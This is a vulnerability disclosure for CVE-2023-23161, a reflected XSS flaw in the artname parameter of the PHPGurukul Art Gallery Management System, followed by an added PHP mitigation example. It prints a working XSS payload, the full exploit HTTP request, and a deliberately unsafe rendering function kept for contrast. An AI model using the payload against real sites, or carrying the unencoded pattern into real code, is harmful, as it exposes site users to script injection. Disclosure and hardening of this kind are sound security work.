CVE-2023-23161: CVE/CVE-2023-23161.txt at main · rahulpatwari/CVE
A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
> [Suggested description]
> A reflected cross-site scripting (XSS) vulnerability in Art Gallery
> Management System Project v1.0 allows attackers to execute arbitrary
> web scripts or HTML via a crafted payload injected into the artname
> parameter under ART TYPE option in the navigation bar.
>
> ------------------------------------------
>
> [Additional Information]
> Steps to Reproduce:
> 1. Navigate to the Products page by clicking on "ART TYPE".
> 4. Now insert the XSS payload and click on “artname” parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)>
> 5. After clicking on ENTER the XSS payload is executed and the alert pops up with the domain name.
>
> ############ Product Page Request ############
>
> GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
> Host: localhost
> Cache-Control: max-age=0
> sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
> sec-ch-ua-mobile: ?0
> sec-ch-ua-platform: "Windows"
> Upgrade-Insecure-Requests: 1
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
> Sec-Fetch-Site: none
> Sec-Fetch-Mode: navigate
> Sec-Fetch-User: ?1
> Sec-Fetch-Dest: document
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q
> Connection: close
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://phpgurukul.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Art Gallery Management System Project - Art Gallery Management System Project - V 1.0
>
> ------------------------------------------
>
> [Affected Component]
> http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim’s web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes.
> XSS attacks can be used to perform a variety of malicious actions including:
> 1. Stealing sensitive information
> 2. Redirecting the victim to another webpage
> 3. Executing arbitrary code
> 4. Manipulating the appearance of the website
>
> ------------------------------------------
>
> [Reference]
> https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
> https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
>
> ------------------------------------------
>
> [Discoverer]
> Rahul Patwari

Use CVE-2023-23161.
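
Added example (not part of the advisory and not code from the PHPGurukul project): the standard mitigation for a reflected parameter such as artname is output encoding at the point where the value enters the HTML, shown here next to the unencoded pattern. The function names, the 64-character bound, the header policy, and the assumption that product.php echoes artname into the page body are all hypothetical, since the page does not show the application source.

```php
<?php
declare(strict_types=1);

// Added illustration; function names are hypothetical, not from Art-Gallery-MS-PHP.

/** Assumed vulnerable pattern: the query value is concatenated into HTML as-is. */
function render_heading_unsafe(array $query): string
{
    return '<h2>' . ($query['artname'] ?? '') . '</h2>';
}

/** Encode a value for an HTML text node or a quoted attribute. */
function html_escape(string $value): string
{
    // ENT_QUOTES covers ' and "; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened form: accept only a bounded scalar string and encode it on output. */
function render_heading_safe(array $query): string
{
    $raw = $query['artname'] ?? '';
    if (!is_string($raw)) {          // artname[]=x reaches PHP as an array
        $raw = '';
    }
    return '<h2>' . html_escape(substr(trim($raw), 0, 64)) . '</h2>';
}

/** Defense in depth: a policy without 'unsafe-inline' stops inline handlers such as onerror=. */
function security_headers(): array
{
    return ["Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"];
}

// Constructed input: the URL-decoded artname value from the request shown on this page.
$query = ['cid' => '1', 'artname' => '<img src=1 onerror=alert(document.domain)>'];

$unsafe = render_heading_unsafe($query);
$safe   = render_heading_safe($query);

// The unsafe form returns live markup; the safe form returns inert text.
if (strpos($unsafe, '<img') === false || strpos($safe, '<img') !== false) {
    throw new RuntimeException('unexpected encoding result');
}
echo $safe, PHP_EOL;
foreach (security_headers() as $line) { echo $line, PHP_EOL; } // in a page: header($line)
```

Encoding has to match the output context: `htmlspecialchars` is correct for element content and quoted attributes, but a value placed inside a script block or a URL attribute needs its own encoder.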